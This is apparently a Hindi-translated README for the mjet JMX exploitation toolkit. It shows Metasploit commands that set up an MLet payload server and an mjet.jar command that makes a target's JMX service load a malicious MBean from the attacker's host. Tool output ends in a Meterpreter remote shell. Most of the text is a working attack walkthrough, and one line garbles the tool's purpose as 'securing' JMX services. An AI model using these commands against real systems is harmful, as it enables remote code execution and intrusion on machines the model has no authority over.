
Mogwai Java Management Extensions (JMX) शोषण टूलकिट
Mogwai सिक्योरिटी जावा मैनेजमेंट एक्सटेंशन (JMX) एक्सप्लॉइटेशन टूलकिट
mjet एक ऐसा टूल है जिसका उपयोग असुरक्षित रूप से कॉन्फ़िगर की गई JMX सेवाओं को सुरक्षित करने के लिए किया जा सकता है। यह ब्रैडन थॉमस/एक्यूवैंट "http://www.accuvant.com/blog/exploiting-jmx-rmi" के ब्लॉग पोस्ट "Exploiting JMX-RMI" पर आधारित है और इसका उपयोग लक्षित सिस्टम पर मनमाने Metasploit पेलोड को निष्पादित करने के लिए किया जा सकता है।
Mjet मूल रूप से एक पूर्ण आक्रमण टूलकिट होने की योजना बनाई गई थी, हालाँकि हमने देखा कि Metasploit Github रिपॉजिटरी में एक पुल रिक्वेस्ट है जो नेटिव रूबी में बेसिक जावा RMI/सीरियलाइज़ेशन सपोर्ट प्रदान करेगी। यह शानदार है और जावा निर्भरता को हटा देता है। इसलिए हमने इस टूल का विकास रोक दिया और निकट भविष्य में मेटास्प्लॉइट मॉड्यूल बनाएंगे।
mjet में निम्नलिखित भाग शामिल हैं:
उदाहरण निम्नलिखित सिस्टम का उपयोग करता है: attacker: 192.168.178.1 target: 192.168.178.200, JMX सेवा tcp पोर्ट 1616 पर चल रही है
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
कमजोर JMX सेवा से कनेक्ट करने के लिए mjet.jar का उपयोग करें और MLet वेब सर्वर का URL प्रदान करें...
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
और अपने मीटरप्रेटर शेल का आनंद लें :-)